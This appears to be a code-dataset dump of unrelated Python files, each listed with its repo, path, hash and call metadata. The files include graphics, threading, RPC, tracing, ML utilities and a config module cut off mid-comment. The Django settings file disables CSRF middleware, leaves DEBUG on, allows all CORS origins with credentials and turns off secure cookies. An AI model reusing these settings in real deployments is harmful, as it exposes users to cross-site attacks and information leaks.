self.lines[self.activeID] = self.activeLine
self.editState = self.EDIT
self.notifyEdit( self.activeLine )
elif ( self.editState == self.EDIT ):
assert( self.activeID > -1 )
self.lines[ self.activeID ] = self.activeLine
self.notifyEdit( self.activeLine )
self.activeLine = None
self.activeLine = None
self.dragging = False
result.set( True, True, False )
elif ( event.type == MouseEvent.MOVE ):
if ( self.dragging ):
x, y = view.screenToWorld( ( eX, eY ) )
p2 = Vector2( x, y )
self.activeLine.p2 = p2
result.set( True, True, False )
self.notifyEdit( self.activeLine )
return result
def notifyEdit( self, line ):
'''Notifies call back of a line that has changed'''
if ( not self.editCB is None ):
self.editCB( line )
def drawGL( self ):
'''Basic lines are drawn in default (green), the active line is drawn in yellow,
and when it is being edited, the original disappears and the new line is drawn in
cyan.'''
if ( self.activeLine ):
self.activeLine.drawGL( ( 0.1, 1.0, 1.0 ) )
elif ( self.activeID > -1 and self.editState != self.ADD ):
self.lines[ self.activeID ].drawGL( ( 1.0, 1.0, 0.1 ) )
for i, line in enumerate( self.lines ):
if ( i == self.activeID ): continue
line.drawGL()
| [((20, 8, 20, 40), 'primitives.Segment.__init__', 'Segment.__init__', ({(20, 26, 20, 30): 'self', (20, 32, 20, 34): 'p1', (20, 36, 20, 38): 'p2'}, {}), '(self, p1, p2)', False, 'from primitives import Vector2, Segment\n'), ((84, 21, 84, 46), 'copy.deepcopy', 'deepcopy', ({(84, 31, 84, 44): 'context.lines'}, {}), '(context.lines)', False, 'from copy import deepcopy\n'), ((122, 42, 122, 55), 'primitives.Vector2', 'Vector2', ({(122, 50, 122, 51): '(0)', (122, 53, 122, 54): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((122, 57, 122, 70), 'primitives.Vector2', 'Vector2', ({(122, 65, 122, 66): '(0)', (122, 68, 122, 69): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((195, 35, 195, 52), 'primitives.Vector2', 'Vector2', ({(195, 44, 195, 46): 'eX', (195, 48, 195, 50): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((197, 25, 197, 40), 'primitives.Vector2', 'Vector2', ({(197, 34, 197, 35): 'x', (197, 37, 197, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n'), ((217, 29, 217, 46), 'primitives.Vector2', 'Vector2', ({(217, 38, 217, 40): 'eX', (217, 42, 217, 44): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((235, 25, 235, 40), 'primitives.Vector2', 'Vector2', ({(235, 34, 235, 35): 'x', (235, 37, 235, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n')] |
Paola351/instascrape | instascrape/collectors/__init__.py | b4a50c9140fa9054187738f6d1564cecc32cbaab | from .interval_collectors import *
| [] |
ghoslation/algorithm | Codes/gracekoo/test.py | 5708bf89e59a80cd0f50f2e6138f069b4f9bc96e | # -*- coding: utf-8 -*-
# @Time: 2020/11/8 23:47
# @Author: GraceKoo
# @File: test.py
# @Desc:
from threading import Thread
import time
def print_numbers():
time.sleep(0.2)
print("子线程结束")
if __name__ == "__main__":
t1 = Thread(target=print_numbers)
t1.setDaemon(True)
t1.start()
# print("主线程结束")
| [((11, 4, 11, 19), 'time.sleep', 'time.sleep', ({(11, 15, 11, 18): '(0.2)'}, {}), '(0.2)', False, 'import time\n'), ((16, 9, 16, 37), 'threading.Thread', 'Thread', (), '', False, 'from threading import Thread\n')] |
gregory-chekler/api | src/_main_/settings.py | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | """
Django settings for massenergize_portal_backend project.
Generated by 'django-admin startproject' using Django 2.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import firebase_admin
from firebase_admin import credentials
from .utils.utils import load_json
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ******** LOAD CONFIG DATA ***********#
IS_PROD = False
path_to_config = '/_main_/config/massenergizeProdConfig.json' if IS_PROD else '/_main_/config/massenergizeProjectConfig.json'
CONFIG_DATA = load_json(BASE_DIR + path_to_config)
os.environ.update(CONFIG_DATA)
# ******** END LOAD CONFIG DATA ***********#
SECRET_KEY = CONFIG_DATA["SECRET_KEY"]
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'api.massenergize.org',
'apis.massenergize.org',
'api.massenergize.com',
'apis.massenergize.com',
'api-prod.massenergize.org',
'api.prod.massenergize.org',
'api-dev.massenergize.org',
'api.dev.massenergize.org',
'massenergize-api.wpdvzstek2.us-east-2.elasticbeanstalk.com'
]
INSTALLED_APPS = [
'authentication',
'carbon_calculator',
'database',
'api',
'website',
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
#custom middlewares
'authentication.middleware.MassenergizeJWTAuthMiddleware'
]
#-------- FILE STORAGE CONFIGURATION ---------------------#
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
#-------- FILE STORAGE CONFIGURATION ---------------------#
#-------- AWS CONFIGURATION ---------------------#
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')
AWS_S3_SIGNATURE_VERSION = os.environ.get('AWS_S3_SIGNATURE_VERSION')
AWS_S3_REGION_NAME = os.environ.get('AWS_S3_REGION_NAME')
AWS_DEFAULT_ACL = None
#--------END AWS CONFIGURATION ---------------------#
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440*3
ROOT_URLCONF = '_main_.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = '_main_.wsgi.application'
CSRF_COOKIE_SECURE = False
SESSION_COOKIE_SECURE = False
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'remote-default': {
'ENGINE' : os.environ.get('DATABASE_ENGINE'),
'NAME' : os.environ.get('DATABASE_NAME'),
'USER' : os.environ.get('DATABASE_USER'),
'PASSWORD' : os.environ.get('DATABASE_PASSWORD'),
'HOST' : os.environ.get('DATABASE_HOST'),
'PORT' : os.environ.get('DATABASE_PORT')
},
'default': {
'ENGINE' : os.environ.get('DATABASE_ENGINE'),
'NAME' : 'gchekler21',
'USER' : '',
'PASSWORD' : '',
'HOST' : 'localhost',
'PORT' : '5555'
},
}
firebase_service_account_path = '/_main_/config/massenergizeProdFirebaseServiceAccount.json' if IS_PROD else '/_main_/config/massenergizeFirebaseServiceAccount.json'
FIREBASE_CREDENTIALS = credentials.Certificate(BASE_DIR + firebase_service_account_path)
firebase_admin.initialize_app(FIREBASE_CREDENTIALS)
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = os.environ.get('EMAIL')
DEFAULT_FROM_EMAIL = os.environ.get('EMAIL')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASSWORD')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# Simplified static file serving.
STATICFILES_LOCATION = 'static'
MEDIAFILES_LOCATION = 'media'
| [((25, 0, 25, 30), 'os.environ.update', 'os.environ.update', ({(25, 18, 25, 29): 'CONFIG_DATA'}, {}), '(CONFIG_DATA)', False, 'import os\n'), ((84, 27, 84, 62), 'os.environ.get', 'os.environ.get', ({(84, 42, 84, 61): '"""AWS_ACCESS_KEY_ID"""'}, {}), "('AWS_ACCESS_KEY_ID')", False, 'import os\n'), ((85, 27, 85, 66), 'os.environ.get', 'os.environ.get', ({(85, 42, 85, 65): '"""AWS_SECRET_ACCESS_KEY"""'}, {}), "('AWS_SECRET_ACCESS_KEY')", False, 'import os\n'), ((86, 27, 86, 68), 'os.environ.get', 'os.environ.get', ({(86, 42, 86, 67): '"""AWS_STORAGE_BUCKET_NAME"""'}, {}), "('AWS_STORAGE_BUCKET_NAME')", False, 'import os\n'), ((87, 27, 87, 69), 'os.environ.get', 'os.environ.get', ({(87, 42, 87, 68): '"""AWS_S3_SIGNATURE_VERSION"""'}, {}), "('AWS_S3_SIGNATURE_VERSION')", False, 'import os\n'), ((88, 27, 88, 63), 'os.environ.get', 'os.environ.get', ({(88, 42, 88, 62): '"""AWS_S3_REGION_NAME"""'}, {}), "('AWS_S3_REGION_NAME')", False, 'import os\n'), ((143, 23, 143, 88), 'firebase_admin.credentials.Certificate', 'credentials.Certificate', ({(143, 47, 143, 87): 'BASE_DIR + firebase_service_account_path'}, {}), '(BASE_DIR + firebase_service_account_path)', False, 'from firebase_admin import credentials\n'), ((144, 0, 144, 51), 'firebase_admin.initialize_app', 'firebase_admin.initialize_app', ({(144, 30, 144, 50): 'FIREBASE_CREDENTIALS'}, {}), '(FIREBASE_CREDENTIALS)', False, 'import firebase_admin\n'), ((182, 18, 182, 41), 'os.environ.get', 'os.environ.get', ({(182, 33, 182, 40): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((183, 21, 183, 44), 'os.environ.get', 'os.environ.get', ({(183, 36, 183, 43): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((184, 22, 184, 54), 'os.environ.get', 'os.environ.get', ({(184, 37, 184, 53): '"""EMAIL_PASSWORD"""'}, {}), "('EMAIL_PASSWORD')", False, 'import os\n'), ((19, 43, 19, 68), 'os.path.abspath', 'os.path.abspath', ({(19, 59, 19, 67): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((125, 21, 125, 54), 'os.environ.get', 'os.environ.get', ({(125, 36, 125, 53): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n'), ((126, 21, 126, 52), 'os.environ.get', 'os.environ.get', ({(126, 36, 126, 51): '"""DATABASE_NAME"""'}, {}), "('DATABASE_NAME')", False, 'import os\n'), ((127, 21, 127, 52), 'os.environ.get', 'os.environ.get', ({(127, 36, 127, 51): '"""DATABASE_USER"""'}, {}), "('DATABASE_USER')", False, 'import os\n'), ((128, 21, 128, 56), 'os.environ.get', 'os.environ.get', ({(128, 36, 128, 55): '"""DATABASE_PASSWORD"""'}, {}), "('DATABASE_PASSWORD')", False, 'import os\n'), ((129, 21, 129, 52), 'os.environ.get', 'os.environ.get', ({(129, 36, 129, 51): '"""DATABASE_HOST"""'}, {}), "('DATABASE_HOST')", False, 'import os\n'), ((130, 21, 130, 52), 'os.environ.get', 'os.environ.get', ({(130, 36, 130, 51): '"""DATABASE_PORT"""'}, {}), "('DATABASE_PORT')", False, 'import os\n'), ((133, 22, 133, 55), 'os.environ.get', 'os.environ.get', ({(133, 37, 133, 54): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n')] |
urands/aiorpcgrid | aiorpcgrid/client.py | 7bc9ee9a80fa843998b2604d7c0803b323628480 | import asyncio
# from aiorpcgrid.client import Client
from aiorpcgrid.task import AsyncTask, State
class AsyncClient:
_provider = None
_method = None
_requests: dict = {}
_running = True
_request_queue: asyncio.Queue = asyncio.Queue()
_loop = None
def __init__(self, provider, loop=None):
self._provider = provider
if loop is None:
loop = asyncio.get_event_loop()
self._loop = loop
async def open(self):
await self._provider.open()
asyncio.ensure_future(self.request_loop(), loop=self._loop)
asyncio.ensure_future(self.run(), loop=self._loop)
return self
async def close(self):
self._running = False
await self._provider.close()
await self._request_queue.put(None)
async def request_loop(self):
while self._running:
task = await self._request_queue.get()
if task is not None:
await self.provider.call_method(task)
task.status = State.RUNNING
if self._request_queue.empty():
self._request_queue.task_done()
async def run(self):
while self._running:
responses = await self._provider.recv()
if responses is not None:
for response in responses:
if response.id in self._requests:
task = self._requests[response.id]
task.result = response.result
task.error = response.error
if task.error is None:
self._requests[
response.id
].status = State.COMPLETED
else:
self._requests[response.id].status = State.FAILED
task.event.set()
del self._requests[response.id]
if task._callback is not None:
asyncio.ensure_future(
task.callback(task), loop=self._loop
)
def __call__(self, *args, **kwargs):
if not self.provider.is_connected():
raise ConnectionError(f'Connection lost. {self._provider}')
task = AsyncTask().create(self._method, *args, **kwargs)
if 'parallel' in kwargs:
task._parallel = kwargs['parallel']
self._method = None
task.status = State.PENDING
self._requests[task.id] = task
self._request_queue.put_nowait(self._requests[task.id])
return self._requests[task.id]
| [((12, 36, 12, 51), 'asyncio.Queue', 'asyncio.Queue', ({}, {}), '()', False, 'import asyncio\n'), ((18, 19, 18, 43), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((67, 15, 67, 26), 'aiorpcgrid.task.AsyncTask', 'AsyncTask', ({}, {}), '()', False, 'from aiorpcgrid.task import AsyncTask, State\n')] |
matt-tyler/opentelemetry-lambda | python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py | 6b427d351fa721620fcd387e836e9f2f9f20cb60 | # Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: usage
"""
The opentelemetry-instrumentation-aws-lambda package allows tracing AWS
Lambda function.
Usage
-----
.. code:: python
# Copy this snippet into AWS Lambda function
# Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html
import boto3
from opentelemetry.instrumentation.aws_lambda import (
AwsLambdaInstrumentor
)
# Enable instrumentation
AwsLambdaInstrumentor().instrument()
# Lambda function
def lambda_handler(event, context):
s3 = boto3.resource('s3')
for bucket in s3.buckets.all():
print(bucket.name)
return "200 OK"
API
---
"""
import logging
import os
from importlib import import_module
from wrapt import wrap_function_wrapper
# TODO: aws propagator
from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import (
AwsXRayFormat,
)
from opentelemetry.instrumentation.aws_lambda.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider
logger = logging.getLogger(__name__)
class AwsLambdaInstrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider"))
self._tracer_provider = get_tracer_provider()
lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
wrapped_names = lambda_handler.rsplit(".", 1)
self._wrapped_module_name = wrapped_names[0]
self._wrapped_function_name = wrapped_names[1]
wrap_function_wrapper(
self._wrapped_module_name,
self._wrapped_function_name,
self._functionPatch,
)
def _uninstrument(self, **kwargs):
unwrap(
import_module(self._wrapped_module_name),
self._wrapped_function_name,
)
def _functionPatch(self, original_func, instance, args, kwargs):
lambda_context = args[1]
ctx_aws_request_id = lambda_context.aws_request_id
ctx_invoked_function_arn = lambda_context.invoked_function_arn
orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
# TODO: enable propagate from AWS by env variable
xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "")
lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME")
function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION")
propagator = AwsXRayFormat()
parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id})
with self._tracer.start_as_current_span(
name=orig_handler, context=parent_context, kind=SpanKind.SERVER
) as span:
# Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example
span.set_attribute("faas.execution", ctx_aws_request_id)
span.set_attribute("faas.id", ctx_invoked_function_arn)
# TODO: fix in Collector because they belong resource attrubutes
span.set_attribute("faas.name", lambda_name)
span.set_attribute("faas.version", function_version)
result = original_func(*args, **kwargs)
# force_flush before function quit in case of Lambda freeze.
self._tracer_provider.force_flush()
return result
| [((62, 9, 62, 36), 'logging.getLogger', 'logging.getLogger', ({(62, 27, 62, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((69, 32, 69, 53), 'opentelemetry.trace.get_tracer_provider', 'get_tracer_provider', ({}, {}), '()', False, 'from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider\n'), ((76, 8, 80, 9), 'wrapt.wrap_function_wrapper', 'wrap_function_wrapper', ({(77, 12, 77, 37): 'self._wrapped_module_name', (78, 12, 78, 39): 'self._wrapped_function_name', (79, 12, 79, 31): 'self._functionPatch'}, {}), '(self._wrapped_module_name, self.\n _wrapped_function_name, self._functionPatch)', False, 'from wrapt import wrap_function_wrapper\n'), ((95, 24, 95, 62), 'os.environ.get', 'os.environ.get', ({(95, 39, 95, 57): '"""_X_AMZN_TRACE_ID"""', (95, 59, 95, 61): '""""""'}, {}), "('_X_AMZN_TRACE_ID', '')", False, 'import os\n'), ((97, 22, 97, 64), 'os.environ.get', 'os.environ.get', ({(97, 37, 97, 63): '"""AWS_LAMBDA_FUNCTION_NAME"""'}, {}), "('AWS_LAMBDA_FUNCTION_NAME')", False, 'import os\n'), ((98, 27, 98, 72), 'os.environ.get', 'os.environ.get', ({(98, 42, 98, 71): '"""AWS_LAMBDA_FUNCTION_VERSION"""'}, {}), "('AWS_LAMBDA_FUNCTION_VERSION')", False, 'import os\n'), ((100, 21, 100, 36), 'opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format.AwsXRayFormat', 'AwsXRayFormat', ({}, {}), '()', False, 'from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import AwsXRayFormat\n'), ((71, 56, 71, 82), 'os.environ.get', 'os.environ.get', ({(71, 71, 71, 81): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n'), ((84, 12, 84, 52), 'importlib.import_module', 'import_module', ({(84, 26, 84, 51): 'self._wrapped_module_name'}, {}), '(self._wrapped_module_name)', False, 'from importlib import import_module\n'), ((92, 54, 92, 80), 'os.environ.get', 'os.environ.get', ({(92, 69, 92, 79): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n')] |
bastoune57/gokiting_back_end | instructors/migrations/0021_alter_user_avatar_url.py | f3edcbeede292713349b28f2390b5d57e1420f8e | # Generated by Django 4.0.2 on 2022-04-01 16:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instructors', '0020_alter_user_description_alter_user_title'),
]
operations = [
migrations.AlterField(
model_name='user',
name='avatar_url',
field=models.ImageField(default='profile_pics/einstein_EqBibwO.jpeg', upload_to='profile_pics'),
),
]
| [((16, 18, 16, 107), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n')] |
SamplingAndEnsemblingSolvers/SamplingAndEnsemblingSolvers | sopa/src/models/utils.py | 5ad3cae76c3cc9cec4d347807012e61121ea61b9 | import numpy as np
import torch
import random
from .odenet_mnist.layers import MetaNODE
def fix_seeds(seed=502):
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.set_printoptions(precision=10)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
class RunningAverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, momentum=0.99):
self.momentum = momentum
self.reset()
def reset(self):
self.val = None
self.avg = 0
def update(self, val):
if self.val is None:
self.avg = val
else:
self.avg = self.avg * self.momentum + val * (1 - self.momentum)
self.val = val
def load_model(path):
(_, state_dict), (_, model_args), (_, slover_id) = torch.load(path, map_location='cpu').items()
is_odenet = model_args.network == 'odenet'
if not hasattr(model_args, 'in_channels'):
model_args.in_channels = 1
model = MetaNODE(downsampling_method=model_args.downsampling_method,
is_odenet=is_odenet,
in_channels=model_args.in_channels)
model.load_state_dict(state_dict)
return model, model_args | [((8, 4, 8, 24), 'numpy.random.seed', 'np.random.seed', ({(8, 19, 8, 23): 'seed'}, {}), '(seed)', True, 'import numpy as np\n'), ((9, 4, 9, 21), 'random.seed', 'random.seed', ({(9, 16, 9, 20): 'seed'}, {}), '(seed)', False, 'import random\n'), ((10, 4, 10, 27), 'torch.manual_seed', 'torch.manual_seed', ({(10, 22, 10, 26): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((11, 4, 11, 36), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', ({(11, 31, 11, 35): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((12, 4, 12, 40), 'torch.set_printoptions', 'torch.set_printoptions', (), '', False, 'import torch\n'), ((37, 55, 37, 91), 'torch.load', 'torch.load', (), '', False, 'import torch\n')] |
TheVinhLuong102/micropy-stubs | packages/micropython-official/v1.10/esp32/stubs/ubinascii.py | 55ff1773008f7c4dfc3d70a403986486226eb6b3 | """
Module: 'ubinascii' on esp32 1.10.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.10.0', version='v1.10 on 2019-01-25', machine='ESP32 module with ESP32')
# Stubber: 1.2.0
def a2b_base64():
pass
def b2a_base64():
pass
def crc32():
pass
def hexlify():
pass
def unhexlify():
pass
| [] |
chenwang/QuantEcon.lectures.code | jv/test_jv.py | 8832a74acd219a71cb0a99dc63c5e976598ac999 | """
@author : Spencer Lyon
"""
from __future__ import division
import sys
import unittest
from nose.plugins.skip import SkipTest
from jv import JvWorker
from quantecon import compute_fixed_point
from quantecon.tests import get_h5_data_file, write_array, max_abs_diff
# specify params -- use defaults
A = 1.4
alpha = 0.6
beta = 0.96
grid_size = 50
if sys.version_info[0] == 2:
v_nm = "V"
else: # python 3
raise SkipTest("Python 3 tests aren't ready.")
v_nm = "V_py3"
def _new_solution(jv, f, grp):
"gets new solution and updates data file"
V = _solve_via_vfi(jv)
write_array(f, grp, V, v_nm)
return V
def _solve_via_vfi(jv):
"compute policy rules via value function iteration"
v_init = jv.x_grid * 0.6
V = compute_fixed_point(jv.bellman_operator, v_init,
max_iter=3000,
error_tol=1e-5)
return V
def _get_vf_guess(jv, force_new=False):
with get_h5_data_file() as f:
# See if the jv group already exists
group_existed = True
try:
jv_group = f.getNode("/jv")
except:
# doesn't exist
group_existed = False
jv_group = f.create_group("/", "jv", "data for jv.py tests")
if force_new or not group_existed:
# group doesn't exist, or forced to create new data.
# This function updates f in place and returns v_vfi, c_vfi, c_pfi
V = _new_solution(jv, f, jv_group)
return V
# if we made it here, the group exists and we should try to read
# existing solutions
try:
# Try reading vfi
if sys.version_info[0] == 2:
V = jv_group.V[:]
else: # python 3
V = jv_group.V_py3[:]
except:
# doesn't exist. Let's create it
V = _new_solution(jv, f, jv_group)
return V
class TestJvWorkder(unittest.TestCase):
@classmethod
def setUpClass(cls):
jv = JvWorker(A=A, alpha=alpha, beta=beta, grid_size=grid_size)
cls.jv = jv
# compute solution
v_init = _get_vf_guess(jv)
cls.V = compute_fixed_point(jv.bellman_operator, v_init)
cls.s_pol, cls.phi_pol = jv.bellman_operator(cls.V * 0.999,
return_policies=True)
def test_low_x_prefer_s(self):
"jv: s preferred to phi with low x?"
# low x is an early index
self.assertGreaterEqual(self.s_pol[0], self.phi_pol[0])
def test_high_x_prefer_phi(self):
"jv: phi preferred to s with high x?"
# low x is an early index
self.assertGreaterEqual(self.phi_pol[-1], self.s_pol[-1])
def test_policy_sizes(self):
"jv: policies correct size"
n = self.jv.x_grid.size
self.assertEqual(self.s_pol.size, n)
self.assertEqual(self.phi_pol.size, n)
def test_bellman_sol_fixed_point(self):
"jv: solution to bellman is fixed point"
new_V = self.jv.bellman_operator(self.V)
self.assertLessEqual(max_abs_diff(new_V, self.V), 1e-4)
| [((23, 10, 23, 50), 'nose.plugins.skip.SkipTest', 'SkipTest', ({(23, 19, 23, 49): '"""Python 3 tests aren\'t ready."""'}, {}), '("Python 3 tests aren\'t ready.")', False, 'from nose.plugins.skip import SkipTest\n'), ((30, 4, 30, 32), 'quantecon.tests.write_array', 'write_array', ({(30, 16, 30, 17): 'f', (30, 19, 30, 22): 'grp', (30, 24, 30, 25): 'V', (30, 27, 30, 31): 'v_nm'}, {}), '(f, grp, V, v_nm)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((38, 8, 40, 43), 'quantecon.compute_fixed_point', 'compute_fixed_point', (), '', False, 'from quantecon import compute_fixed_point\n'), ((45, 9, 45, 27), 'quantecon.tests.get_h5_data_file', 'get_h5_data_file', ({}, {}), '()', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((83, 13, 83, 71), 'jv.JvWorker', 'JvWorker', (), '', False, 'from jv import JvWorker\n'), ((88, 16, 88, 64), 'quantecon.compute_fixed_point', 'compute_fixed_point', ({(88, 36, 88, 55): 'jv.bellman_operator', (88, 57, 88, 63): 'v_init'}, {}), '(jv.bellman_operator, v_init)', False, 'from quantecon import compute_fixed_point\n'), ((111, 29, 111, 56), 'quantecon.tests.max_abs_diff', 'max_abs_diff', ({(111, 42, 111, 47): 'new_V', (111, 49, 111, 55): 'self.V'}, {}), '(new_V, self.V)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n')] |
LaudateCorpus1/excentury | excentury/command/config.py | 8d0f20bb3e543382170e042fac51a56377c4024b | """Config
This module is in charge of providing all the necessary settings to
the rest of the modules in excentury.
"""
import os
import re
import sys
import textwrap
import argparse
from collections import OrderedDict
from excentury.command import error, trace, import_mod
DESC = """Edit a configuration file for excentury.
Some actions performed by excentury can be overwritten by using
configuration files.
To see the values that the configuration file can overwrite use the
`defaults` command. This will print a list of the keys and values
excentury uses for the given command.
"""
RE = re.compile(r'\${(?P<key>.*?)}')
RE_IF = re.compile(
r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]'
)
RE_IFELSE = re.compile(
r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]ELSE (?P<iffalse>.*)'
)
def disp(msg):
"""Wrapper around sys.stdout.write which is meant to behave as
the print function but it does not add the newline character. """
sys.stdout.write(msg)
def _replacer(*key_val):
"""Helper function for replace.
Source: <http://stackoverflow.com/a/15221068/788553>
"""
replace_dict = dict(key_val)
replacement_function = lambda match: replace_dict[match.group(0)]
pattern = re.compile("|".join([re.escape(k) for k, _ in key_val]), re.M)
return lambda string: pattern.sub(replacement_function, string)
def replace(string, *key_val):
"""Replacement of strings done in one pass. Example:
>>> replace("a < b && b < c", ('<', '<'), ('&', '&'))
'a < b && b < c'
Source: <http://stackoverflow.com/a/15221068/788553>
"""
return _replacer(*key_val)(string)
class ConfigDispAction(argparse.Action): # pylint: disable=R0903
"""Derived argparse Action class to use when displaying the
configuration file and location."""
def __call__(self, parser, namespace, values, option_string=None):
try:
read_config(namespace)
except IOError:
disp('xcpp.config not found in %r\n' % namespace.cfg)
else:
disp('path to xcpp.config: "%s"\n' % namespace.cfg)
with open('%s/xcpp.config' % namespace.cfg, 'r') as _fp:
disp(_fp.read())
exit(0)
def add_parser(subp, raw):
"Add a parser to the main subparser. "
tmpp = subp.add_parser('config', help='configure excentury',
formatter_class=raw,
description=textwrap.dedent(DESC))
tmpp.add_argument('var', type=str, nargs='?', default=None,
help='Must be in the form of sec.key')
tmpp.add_argument('-v', action='store_true',
help='print config file location')
tmpp.add_argument('--print', action=ConfigDispAction,
nargs=0,
help='print config file and exit')
def _get_replacements(tokens, data, sec):
"""Helper function for _read_config. """
replacements = list()
for token in tokens:
if ':' in token:
tsec, tkey = token.split(':')
tval = ''
if tsec in data:
if tkey in data[tsec]:
tval = data[tsec][tkey]
else:
if token in data[sec]:
tval = data[sec][token]
else:
tval = ''
replacements.append(
('${%s}' % token, tval)
)
return replacements
# pylint: disable=invalid-name
# ARG and CFG are names that may be used in the configuration file.
# ARG gives us access to the command line arguments and CFG gives us
# access to the current configuration. Note that using CFG[key][sec]
# is equivalent to ${key:sec}. These names go against the convention
